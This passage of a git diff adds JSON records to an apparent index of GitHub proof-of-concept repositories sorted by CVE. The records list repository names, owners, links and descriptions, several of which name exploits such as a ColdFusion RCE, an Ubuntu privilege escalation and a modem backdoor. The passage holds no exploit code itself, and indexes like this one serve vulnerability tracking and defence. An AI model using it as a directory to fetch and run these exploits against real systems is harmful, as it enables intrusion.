675834921, + "name": "CVE-2023-26067", + "full_name": "horizon3ai\/CVE-2023-26067", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-26067", + "description": "Lexmark CVE-2023-26067", + "fork": false, + "created_at": "2023-08-07T20:55:15Z", + "updated_at": "2024-12-26T01:24:31Z", + "pushed_at": "2023-08-08T13:54:06Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 23, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26136.json b/2023/CVE-2023-26136.json new file mode 100644 index 0000000000..8a8a52d612 --- /dev/null +++ b/2023/CVE-2023-26136.json @@ -0,0 +1,95 @@ +[ + { + "id": 727231092, + "name": "SealSecurityAssignment", + "full_name": "CUCUMBERanOrSNCompany\/SealSecurityAssignment", + "owner": { + "login": "CUCUMBERanOrSNCompany", + "id": 70776104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70776104?v=4", + "html_url": "https:\/\/github.com\/CUCUMBERanOrSNCompany", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CUCUMBERanOrSNCompany\/SealSecurityAssignment", + "description": "Researching on the vulnrability CVE-2023-26136", + "fork": false, + "created_at": "2023-12-04T13:01:29Z", + "updated_at": "2024-07-09T21:23:19Z", + "pushed_at": "2023-12-06T10:50:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796819002, + "name": "Open-Source-Seal-Security", + "full_name": "ronmadar\/Open-Source-Seal-Security", + "owner": { + "login": "ronmadar", + "id": 86679386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86679386?v=4", + "html_url": "https:\/\/github.com\/ronmadar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ronmadar\/Open-Source-Seal-Security", + "description": "Fix open source package uses tough-cookie 2.5.0 - CVE-2023-26136,", + "fork": false, + "created_at": "2024-05-06T17:32:10Z", + "updated_at": "2024-05-07T12:18:59Z", + "pushed_at": "2024-05-07T12:18:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851266445, + "name": "SealSecurity_Exam", + "full_name": "m-lito13\/SealSecurity_Exam", + "owner": { + "login": "m-lito13", + "id": 180002370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180002370?v=4", + "html_url": "https:\/\/github.com\/m-lito13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-lito13\/SealSecurity_Exam", + "description": "Fix prototype pollution vulnerability (CVE-2023-26136) for tough-cookie package", + "fork": false, + "created_at": "2024-09-02T18:50:53Z", + "updated_at": "2024-09-04T11:36:16Z", + "pushed_at": "2024-09-04T11:36:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26144.json b/2023/CVE-2023-26144.json new file mode 100644 index 0000000000..4427b15d94 --- /dev/null +++ b/2023/CVE-2023-26144.json @@ -0,0 +1,33 @@ +[ + { + "id": 679233677, + "name": "apollo-koa-minimal", + "full_name": "tadhglewis\/apollo-koa-minimal", + "owner": { + "login": "tadhglewis", + "id": 53756558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53756558?v=4", + "html_url": "https:\/\/github.com\/tadhglewis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadhglewis\/apollo-koa-minimal", + "description": "GraphQL vulnerability disclosure: CVE-2023-26144", + "fork": false, + "created_at": "2023-08-16T11:44:22Z", + "updated_at": "2024-06-05T00:24:49Z", + "pushed_at": "2024-05-30T00:30:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26255.json b/2023/CVE-2023-26255.json new file mode 100644 index 0000000000..0323a7c816 --- /dev/null +++ b/2023/CVE-2023-26255.json @@ -0,0 +1,64 @@ +[ + { + "id": 683213602, + "name": "CVE-2023-26255-Exp", + "full_name": "tucommenceapousser\/CVE-2023-26255-Exp", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-26255-Exp", + "description": null, + "fork": false, + "created_at": "2023-08-25T21:56:48Z", + "updated_at": "2023-08-25T21:59:39Z", + "pushed_at": "2023-08-25T22:00:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685301639, + "name": "CVE-2023-26255-6", + "full_name": "Nian-Stars\/CVE-2023-26255-6", + "owner": { + "login": "Nian-Stars", + "id": 87457806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457806?v=4", + "html_url": "https:\/\/github.com\/Nian-Stars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nian-Stars\/CVE-2023-26255-6", + "description": "Jira plugin STAGIL Navigation FileName的参数任意文件读取漏洞", + "fork": false, + "created_at": "2023-08-30T23:57:10Z", + "updated_at": "2023-08-31T00:03:30Z", + "pushed_at": "2023-08-31T02:16:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26256.json b/2023/CVE-2023-26256.json new file mode 100644 index 0000000000..e5ba9c58be --- /dev/null +++ b/2023/CVE-2023-26256.json @@ -0,0 +1,126 @@ +[ + { + "id": 682354311, + "name": "CVE-2023-26256", + "full_name": "0x7eTeam\/CVE-2023-26256", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2023-26256", + "description": "CVE-2023-26255_POC,CVE-2023-26256_POC", + "fork": false, + "created_at": "2023-08-24T01:57:00Z", + "updated_at": "2024-12-09T01:45:14Z", + "pushed_at": "2023-08-24T02:27:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683988114, + "name": "CVE-2023-26256", + "full_name": "xhs-d\/CVE-2023-26256", + "owner": { + "login": "xhs-d", + "id": 87455689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455689?v=4", + "html_url": "https:\/\/github.com\/xhs-d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xhs-d\/CVE-2023-26256", + "description": "CVE-2023-26256_POC", + "fork": false, + "created_at": "2023-08-28T08:00:16Z", + "updated_at": "2023-08-28T08:04:58Z", + "pushed_at": "2023-08-29T14:38:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685129397, + "name": "CVE-2023-26256", + "full_name": "qs119\/CVE-2023-26256", + "owner": { + "login": "qs119", + "id": 143074431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143074431?v=4", + "html_url": "https:\/\/github.com\/qs119", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qs119\/CVE-2023-26256", + "description": null, + "fork": false, + "created_at": "2023-08-30T15:21:00Z", + "updated_at": "2023-08-30T15:29:48Z", + "pushed_at": "2023-08-30T15:29:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685757480, + "name": "CVE-2023-26256", + "full_name": "jcad123\/CVE-2023-26256", + "owner": { + "login": "jcad123", + "id": 87455633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455633?v=4", + "html_url": "https:\/\/github.com\/jcad123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcad123\/CVE-2023-26256", + "description": "CVE-2023-26255_POC,CVE-2023-26256_POC", + "fork": false, + "created_at": "2023-09-01T00:10:36Z", + "updated_at": "2023-09-11T01:38:10Z", + "pushed_at": "2023-09-01T00:54:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26258.json b/2023/CVE-2023-26258.json new file mode 100644 index 0000000000..d4e3241eb1 --- /dev/null +++ b/2023/CVE-2023-26258.json @@ -0,0 +1,33 @@ +[ + { + "id": 659758966, + "name": "CVE-2023-26258-ArcServe", + "full_name": "mdsecactivebreach\/CVE-2023-26258-ArcServe", + "owner": { + "login": "mdsecactivebreach", + "id": 29373540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29373540?v=4", + "html_url": "https:\/\/github.com\/mdsecactivebreach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mdsecactivebreach\/CVE-2023-26258-ArcServe", + "description": null, + "fork": false, + "created_at": "2023-06-28T13:51:27Z", + "updated_at": "2024-10-11T19:26:25Z", + "pushed_at": "2024-06-17T13:01:15Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26262.json b/2023/CVE-2023-26262.json new file mode 100644 index 0000000000..35bbd3ae46 --- /dev/null +++ b/2023/CVE-2023-26262.json @@ -0,0 +1,33 @@ +[ + { + "id": 604587204, + "name": "CVE-2023-26262", + "full_name": "istern\/CVE-2023-26262", + "owner": { + "login": "istern", + "id": 909958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/909958?v=4", + "html_url": "https:\/\/github.com\/istern", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/istern\/CVE-2023-26262", + "description": null, + "fork": false, + "created_at": "2023-02-21T11:28:32Z", + "updated_at": "2023-03-08T08:13:20Z", + "pushed_at": "2023-02-21T11:38:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26269.json b/2023/CVE-2023-26269.json new file mode 100644 index 0000000000..4cc7f1d4d7 --- /dev/null +++ b/2023/CVE-2023-26269.json @@ -0,0 +1,41 @@ +[ + { + "id": 722756127, + "name": "CVE-2023-26269", + "full_name": "mbadanoiu\/CVE-2023-26269", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-26269", + "description": "CVE-2023-26269: Misconfigured JMX in Apache James", + "fork": false, + "created_at": "2023-11-23T21:55:30Z", + "updated_at": "2024-12-20T14:21:01Z", + "pushed_at": "2023-11-23T22:10:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2023-26269", + "cves", + "local-privilege-escalation", + "mlet", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2636.json b/2023/CVE-2023-2636.json new file mode 100644 index 0000000000..e0ed50c3c1 --- /dev/null +++ b/2023/CVE-2023-2636.json @@ -0,0 +1,33 @@ +[ + { + "id": 652334926, + "name": "CVE-2023-2636", + "full_name": "lukinneberg\/CVE-2023-2636", + "owner": { + "login": "lukinneberg", + "id": 43212073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43212073?v=4", + "html_url": "https:\/\/github.com\/lukinneberg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukinneberg\/CVE-2023-2636", + "description": null, + "fork": false, + "created_at": "2023-06-11T20:24:20Z", + "updated_at": "2023-08-27T04:42:36Z", + "pushed_at": "2023-07-26T03:46:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26360.json b/2023/CVE-2023-26360.json new file mode 100644 index 0000000000..21cc68e561 --- /dev/null +++ b/2023/CVE-2023-26360.json @@ -0,0 +1,126 @@ +[ + { + "id": 735810164, + "name": "CVE-2023-26360", + "full_name": "yosef0x01\/CVE-2023-26360", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-26360", + "description": "Exploit for Arbitrary File Read for CVE-2023-26360 - Adobe Coldfusion", + "fork": false, + "created_at": "2023-12-26T06:26:01Z", + "updated_at": "2024-06-22T03:24:03Z", + "pushed_at": "2024-06-22T03:23:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800457140, + "name": "CVE-2023-26360-adobe-coldfusion-rce-exploit", + "full_name": "jakabakos\/CVE-2023-26360-adobe-coldfusion-rce-exploit", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-26360-adobe-coldfusion-rce-exploit", + "description": null, + "fork": false, + "created_at": "2024-05-14T11:22:35Z", + "updated_at": "2024-12-25T13:37:08Z", + "pushed_at": "2024-05-14T13:37:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851551513, + "name": "ColdFusion_EXp", + "full_name": "CuriousLearnerDev\/ColdFusion_EXp", + "owner": { + "login": "CuriousLearnerDev", + "id": 72000175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72000175?v=4", + "html_url": "https:\/\/github.com\/CuriousLearnerDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CuriousLearnerDev\/ColdFusion_EXp", + "description": " Adobe ColdFusion CVE-2023-26360\/CVE-2023-29298 自动化实现反弹", + "fork": false, + "created_at": "2024-09-03T09:53:57Z", + "updated_at": "2024-09-03T12:41:47Z", + "pushed_at": "2024-09-03T12:41:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894070708, + "name": "CVE-2023-26360", + "full_name": "issamjr\/CVE-2023-26360", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2023-26360", + "description": "CVE-2023-26360 - Adobe Coldfusion ", + "fork": false, + "created_at": "2024-11-25T17:42:20Z", + "updated_at": "2024-11-25T17:58:30Z", + "pushed_at": "2024-11-25T17:58:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2640.json b/2023/CVE-2023-2640.json new file mode 100644 index 0000000000..02f0eaabf9 --- /dev/null +++ b/2023/CVE-2023-2640.json @@ -0,0 +1,219 @@ +[ + { + "id": 678951072, + "name": "gameoverlay", + "full_name": "OllaPapito\/gameoverlay", + "owner": { + "login": "OllaPapito", + "id": 95946350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95946350?v=4", + "html_url": "https:\/\/github.com\/OllaPapito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OllaPapito\/gameoverlay", + "description": "CVE-2023-2640 CVE-2023-32629", + "fork": false, + "created_at": "2023-08-15T19:07:02Z", + "updated_at": "2024-10-07T19:39:44Z", + "pushed_at": "2023-08-15T19:49:07Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 692901270, + "name": "GameOverlayFS", + "full_name": "luanoliveira350\/GameOverlayFS", + "owner": { + "login": "luanoliveira350", + "id": 11656264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11656264?v=4", + "html_url": "https:\/\/github.com\/luanoliveira350", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luanoliveira350\/GameOverlayFS", + "description": "GameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0", + "fork": false, + "created_at": "2023-09-17T23:17:22Z", + "updated_at": "2024-10-07T19:40:07Z", + "pushed_at": "2023-09-17T23:38:32Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 702722845, + "name": "CVE-2023-2640-CVE-2023-32629", + "full_name": "g1vi\/CVE-2023-2640-CVE-2023-32629", + "owner": { + "login": "g1vi", + "id": 120142960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g1vi\/CVE-2023-2640-CVE-2023-32629", + "description": "GameOver(lay) Ubuntu Privilege Escalation", + "fork": false, + "created_at": "2023-10-09T22:02:42Z", + "updated_at": "2024-12-07T15:13:21Z", + "pushed_at": "2023-10-09T22:44:21Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 120, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713583056, + "name": "CVE-2023-2640-CVE-2023-32629", + "full_name": "musorblyat\/CVE-2023-2640-CVE-2023-32629", + "owner": { + "login": "musorblyat", + "id": 131186350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131186350?v=4", + "html_url": "https:\/\/github.com\/musorblyat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/musorblyat\/CVE-2023-2640-CVE-2023-32629", + "description": null, + "fork": false, + "created_at": "2023-11-02T20:19:57Z", + "updated_at": "2024-10-07T19:44:01Z", + "pushed_at": "2023-11-02T20:23:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765277718, + "name": "Ubuntu-GameOver-Lay", + "full_name": "SanjayRagavendar\/Ubuntu-GameOver-Lay", + "owner": { + "login": "SanjayRagavendar", + "id": 91368803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91368803?v=4", + "html_url": "https:\/\/github.com\/SanjayRagavendar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SanjayRagavendar\/Ubuntu-GameOver-Lay", + "description": "Escalating Privilege using CVE-2023-2640 CVE-2023-3262 ", + "fork": false, + "created_at": "2024-02-29T16:04:58Z", + "updated_at": "2024-03-05T05:47:31Z", + "pushed_at": "2024-03-02T00:29:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774642539, + "name": "CVE-2023-2640-CVE-2023-32629", + "full_name": "Nkipohcs\/CVE-2023-2640-CVE-2023-32629", + "owner": { + "login": "Nkipohcs", + "id": 117274957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117274957?v=4", + "html_url": "https:\/\/github.com\/Nkipohcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nkipohcs\/CVE-2023-2640-CVE-2023-32629", + "description": null, + "fork": false, + "created_at": "2024-03-19T22:56:24Z", + "updated_at": "2024-10-07T19:43:00Z", + "pushed_at": "2024-03-19T23:26:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804086046, + "name": "CVE-2023-2640-32629", + "full_name": "K5LK\/CVE-2023-2640-32629", + "owner": { + "login": "K5LK", + "id": 97132966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97132966?v=4", + "html_url": "https:\/\/github.com\/K5LK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K5LK\/CVE-2023-2640-32629", + "description": null, + "fork": false, + "created_at": "2024-05-21T23:39:02Z", + "updated_at": "2024-10-07T19:44:01Z", + "pushed_at": "2024-05-22T18:38:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2645.json b/2023/CVE-2023-2645.json new file mode 100644 index 0000000000..da1c069d0c --- /dev/null +++ b/2023/CVE-2023-2645.json @@ -0,0 +1,33 @@ +[ + { + "id": 913215424, + "name": "CVE-2023-2645", + "full_name": "xymbiot-solution\/CVE-2023-2645", + "owner": { + "login": "xymbiot-solution", + "id": 168970793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168970793?v=4", + "html_url": "https:\/\/github.com\/xymbiot-solution", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xymbiot-solution\/CVE-2023-2645", + "description": "Simple Backdoor Industrial Internet of Things GSM Modem", + "fork": false, + "created_at": "2025-01-07T08:55:23Z", + "updated_at": "2025-01-07T08:57:14Z", + "pushed_at": "2025-01-07T08:57:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26469.json b/2023/CVE-2023-26469.json new file mode 100644 index 0000000000..d1b84536f3 --- /dev/null +++ b/2023/CVE-2023-26469.json @@ -0,0 +1,33 @@ +[ + { + "id": 685910808, + "name": "CVE-2023-26469", + "full_name": "d0rb\/CVE-2023-26469", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-26469", + "description": "CVE-2023-26469 REC PoC", + "fork": false, + "created_at": "2023-09-01T09:41:32Z", + "updated_at": "2024-06-21T00:11:29Z", + "pushed_at": "2023-09-01T09:46:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2650.json b/2023/CVE-2023-2650.json new file mode 100644 index 0000000000..5d752c8633 --- /dev/null +++ b/2023/CVE-2023-2650.json @@ -0,0 +1,33 @@ +[ + { + "id": 649814822, + "name": "OpenSSL_1.1.1g_CVE-2023-2650", + "full_name": "hshivhare67\/OpenSSL_1.1.1g_CVE-2023-2650", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/OpenSSL_1.1.1g_CVE-2023-2650", + "description": null, + "fork": false, + "created_at": "2023-06-05T17:40:59Z", + "updated_at": "2023-06-05T17:57:48Z", + "pushed_at": "2023-06-05T18:01:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26563.json b/2023/CVE-2023-26563.json new file mode 100644 index 0000000000..00a46fbbcf --- /dev/null +++ b/2023/CVE-2023-26563.json @@ -0,0 +1,33 @@ +[ + { + "id": 651913949, + "name": "CVE-2023-26563-26564-26565", + "full_name": "RupturaInfoSec\/CVE-2023-26563-26564-26565", + "owner": { + "login": "RupturaInfoSec", + "id": 85564448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85564448?v=4", + "html_url": "https:\/\/github.com\/RupturaInfoSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RupturaInfoSec\/CVE-2023-26563-26564-26565", + "description": null, + "fork": false, + "created_at": "2023-06-10T13:33:33Z", + "updated_at": "2023-06-14T10:45:37Z", + "pushed_at": "2023-06-29T20:43:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26602.json b/2023/CVE-2023-26602.json new file mode 100644 index 0000000000..b5d91f0578 --- /dev/null +++ b/2023/CVE-2023-26602.json @@ -0,0 +1,33 @@ +[ + { + "id": 744065657, + "name": "CVE-2023-26602", + "full_name": "D1G17\/CVE-2023-26602", + "owner": { + "login": "D1G17", + "id": 156820616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156820616?v=4", + "html_url": "https:\/\/github.com\/D1G17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1G17\/CVE-2023-26602", + "description": "Exploit information for CVE-2023-26602 ", + "fork": false, + "created_at": "2024-01-16T15:01:33Z", + 